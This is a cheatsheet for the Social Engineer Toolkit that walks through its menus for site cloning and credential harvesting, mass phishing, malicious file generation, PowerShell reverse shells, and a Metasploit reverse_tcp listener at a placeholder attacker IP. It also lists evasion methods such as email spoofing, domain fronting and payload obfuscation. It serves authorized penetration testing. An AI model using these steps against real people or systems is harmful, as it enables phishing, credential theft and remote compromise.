Social Engineer Toolkit (SET) Cheatsheet

The Social Engineer Toolkit (SET) is an open-source penetration testing framework designed for social engineering attacks. Developed by David Kennedy (ReL1K) and the TrustedSec team, SET automates a number of social engineering attacks and provides a comprehensive platform for testing human vulnerabilities in security assessments.

Installation and Setup

Installation on Kali Linux

# SET comes pre-installed on Kali Linux
setoolkit

# Update SET
cd /opt/set
git pull

Manual Installation

# Clone repository
git clone https://github.com/trustedsec/social-engineer-toolkit/ set/
cd set/

# Install dependencies
pip3 install -r requirements.txt

# Run setup
python setup.py install

# Launch SET
python setoolkit

Configuration

# Edit configuration file
nano /etc/setoolkit/set.config

# Key configuration options:
# WEBATTACK_EMAIL=ON
# APACHE_SERVER=ON
# METASPLOIT_PATH=/usr/share/metasploit-framework
# SENDMAIL=ON
# EMAIL_PROVIDER=GMAIL

Main Menu Options

1) Social-Engineering Attacks

# Launch SET
setoolkit

# Select option 1 from main menu
# Social-Engineering Attacks submenu:
# 1) Spear-Phishing Attack Vectors
# 2) Website Attack Vectors  
# 3) Infectious Media Generator
# 4) Create a Payload and Listener
# 5) Mass Mailer Attack
# 6) Arduino-Based Attack Vector
# 7) Wireless Access Point Attack Vector
# 8) QRCode Generator Attack Vector
# 9) Powershell Attack Vectors
# 10) Third Party Modules

Spear-Phishing Attack Vectors

# Option 1 from Social-Engineering Attacks
# Spear-Phishing submenu:
# 1) Perform a Mass Email Attack
# 2) Create a FileFormat Payload
# 3) Create a Social-Engineering Template

# Mass Email Attack
# - Configure SMTP settings
# - Import email list
# - Create or select email template
# - Attach malicious payload

# FileFormat Payload
# - Select file format (PDF, DOC, XLS, etc.)
# - Choose exploit
# - Generate malicious file

# Email Templates
# - Pre-built templates for common scenarios
# - Custom template creation
# - HTML email support

Website Attack Vectors

# Option 2 from Social-Engineering Attacks
# Website Attack submenu:
# 1) Java Applet Attack Method
# 2) Metasploit Browser Exploit Method
# 3) Credential Harvester Attack Method
# 4) Tabnabbing Attack Method
# 5) Web Jacking Attack Method
# 6) Multi-Attack Web Method
# 7) HTA Attack Method

# Credential Harvester
# - Clone legitimate websites
# - Capture credentials
# - Redirect after capture
# - Email harvested credentials

# Java Applet Attack
# - Self-signed Java applet
# - Social engineering prompt
# - Payload execution after acceptance

# Browser Exploit Method
# - Metasploit browser exploits
# - Automatic exploitation
# - Multiple exploit attempts

Attack Scenarios

Credential Harvesting

# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 2) Website Attack Vectors
# Select: 3) Credential Harvester Attack Method

# Harvester options:
# 1) Web Templates
# 2) Site Cloner
# 3) Custom Import

# Site Cloner example:
# Enter URL to clone: https://gmail.com
# SET will clone the site and host locally
# Captured credentials saved to /root/.set/reports/

Phishing Email Campaign

# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 1) Spear-Phishing Attack Vectors
# Select: 1) Perform a Mass Email Attack

# Configuration steps:
# 1) Select attack vector (fileformat, etc.)
# 2) Configure payload
# 3) Setup email template
# 4) Configure SMTP settings
# 5) Import target email list
# 6) Send campaign

# Email list format (emails.txt):
# user1@company.com
# user2@company.com
# user3@company.com

Infectious Media Generator

# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 3) Infectious Media Generator

# Media options:
# 1) File-Format Exploits
# 2) Standard Metasploit Executable

# File-Format Exploits:
# - PDF exploits
# - Microsoft Office exploits
# - Browser-based exploits

# Standard Executable:
# - Windows executable
# - Linux executable
# - Mac OSX executable

PowerShell Attack Vectors

# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 9) Powershell Attack Vectors

# PowerShell options:
# 1) PowerShell Alphanumeric Shellcode Injector
# 2) PowerShell Reverse Shell
# 3) PowerShell Bind Shell
# 4) PowerShell Dump SAM Database

# Reverse Shell example:
# Enter IP address for reverse connection
# Enter port for reverse connection
# Generate PowerShell command
# Execute on target system

Advanced Techniques

Custom Payloads

# Create custom payload
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 4) Create a Payload and Listener

# Payload options:
# 1) Windows Shell Reverse_TCP
# 2) Windows Meterpreter Reverse_TCP
# 3) Windows Meterpreter Reverse_HTTP
# 4) Windows Meterpreter Reverse_HTTPS
# 5) Linux Shell Reverse_TCP

# Configuration:
# Set LHOST (attacker IP)
# Set LPORT (listening port)
# Generate payload
# Setup listener

Multi-Attack Web Method

# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 2) Website Attack Vectors
# Select: 6) Multi-Attack Web Method

# Combines multiple attack vectors:
# - Java Applet Attack
# - Metasploit Browser Exploit
# - Credential Harvester
# - Tabnabbing
# - Web Jacking

# Increases success probability
# Automatic fallback methods
# Comprehensive attack coverage

Arduino-Based Attacks

# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 6) Arduino-Based Attack Vector

# Arduino attack types:
# 1) Powershell HTTP GET MSF Payload
# 2) WSCRIPT HTTP GET MSF Payload
# 3) Powershell HTTP POST MSF Payload
# 4) WSCRIPT HTTP POST MSF Payload
# 5) Download-Execute Powershell Attack
# 6) Download-Execute WSCRIPT Attack

# Generates Arduino sketch
# Physical access required
# Automated payload execution
# Bypasses software restrictions

Integration with Metasploit

Setting up Metasploit Integration

# Configure Metasploit path in SET
nano /etc/setoolkit/set.config

# Set Metasploit path:
METASPLOIT_PATH=/usr/share/metasploit-framework

# Start Metasploit listener
msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST attacker_ip
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit -j

Automated Listener Setup

# SET can automatically setup Metasploit listeners
# When creating payloads, select:
# "Do you want to start the listener now? [y/n]:"
# Select 'y' for automatic listener setup

# SET will:
# 1) Generate appropriate payload
# 2) Start msfconsole
# 3) Configure handler
# 4) Start listener

Reporting and Logging

Credential Reports

# Harvested credentials location
/root/.set/reports/

# View captured credentials
cat /root/.set/reports/2024-01-01\ 12:00:00.txt

# Email reports (if configured)
# Automatic email notifications
# Real-time credential capture alerts

Attack Logs

# SET log files
/root/.set/logs/

# View attack logs
tail -f /root/.set/logs/set_logfile.log

# Apache access logs (for web attacks)
tail -f /var/log/apache2/access.log

# Email logs
tail -f /var/log/mail.log

Custom Reporting

# Generate custom reports
# Parse log files for specific information
grep "credential" /root/.set/logs/set_logfile.log

# Extract IP addresses
grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.set/logs/set_logfile.log

# Count successful attacks
grep -c "successful" /root/.set/logs/set_logfile.log

Evasion Techniques

Email Evasion

# Domain reputation management
# Use legitimate email providers
# Gradual sending patterns
# Personalized content

# Email headers manipulation
# SPF/DKIM configuration
# Reply-to address spoofing
# Message threading

# Content evasion
# Image-based content
# URL shorteners
# Legitimate file hosting

Web Attack Evasion

# Domain fronting
# CDN utilization
# SSL/TLS encryption
# Legitimate hosting providers

# User-Agent rotation
# IP address rotation
# Traffic timing variation
# Legitimate referrer headers

# Content delivery
# Staged payloads
# Encrypted communications
# Legitimate file formats

Payload Evasion

# Encoding techniques
# Encryption methods
# Packing/compression
# Code obfuscation

# Delivery methods
# Legitimate file formats
# Trusted applications
# Signed executables

# Execution techniques
# Living off the land
# PowerShell alternatives
# Memory-only execution

Best Practices

Legal and Ethical Considerations

# Always obtain proper authorization
# Document scope and limitations
# Follow responsible disclosure
# Maintain confidentiality

# Create engagement documentation
echo "Social Engineering Test Authorization" > authorization.txt
echo "Client: Company Name" >> authorization.txt
echo "Scope: Email addresses, domains" >> authorization.txt
echo "Date: $(date)" >> authorization.txt
echo "Tester: Your Name" >> authorization.txt

Operational Security

# Use dedicated infrastructure
# Implement proper logging
# Secure communication channels
# Regular backup procedures

# Infrastructure isolation
# Separate testing networks
# Dedicated email accounts
# Isolated web servers

# Data protection
# Encrypted storage
# Secure transmission
# Proper disposal

Testing Methodology

# Reconnaissance phase
# Target identification
# Information gathering
# Attack vector selection

# Execution phase
# Payload delivery
# Credential harvesting
# System compromise

# Post-exploitation
# Persistence establishment
# Data collection
# Evidence gathering

# Reporting phase
# Impact assessment
# Remediation recommendations
# Executive summary

Troubleshooting

Common Issues

# Email delivery problems
# Check SMTP configuration
# Verify DNS settings
# Test email connectivity

# Web server issues
# Check Apache configuration
# Verify port availability
# Test web connectivity

# Payload generation errors
# Verify Metasploit integration
# Check dependencies
# Update SET framework

# Permission issues
# Run as root user
# Check file permissions
# Verify directory access

Configuration Fixes

# Reset SET configuration
rm /etc/setoolkit/set.config
setoolkit  # Will recreate config

# Update SET framework
cd /opt/set
git pull
python setup.py install

# Fix Apache issues
sudo systemctl restart apache2
sudo systemctl enable apache2

# Fix email issues
sudo systemctl restart postfix
sudo systemctl enable postfix

Resources

• SET Official Documentation
• TrustedSec Blog
• Social Engineering Framework
• NIST Cybersecurity Framework
• SANS Social Engineering